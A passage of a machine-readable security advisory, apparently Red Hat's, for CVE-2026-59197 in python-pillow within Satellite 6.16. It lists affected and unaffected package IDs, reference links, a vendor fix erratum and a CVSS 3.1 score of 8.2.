"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "RHBZ#2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59197"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9695",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"release_date": "2026-07-14T16:25:23.520000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
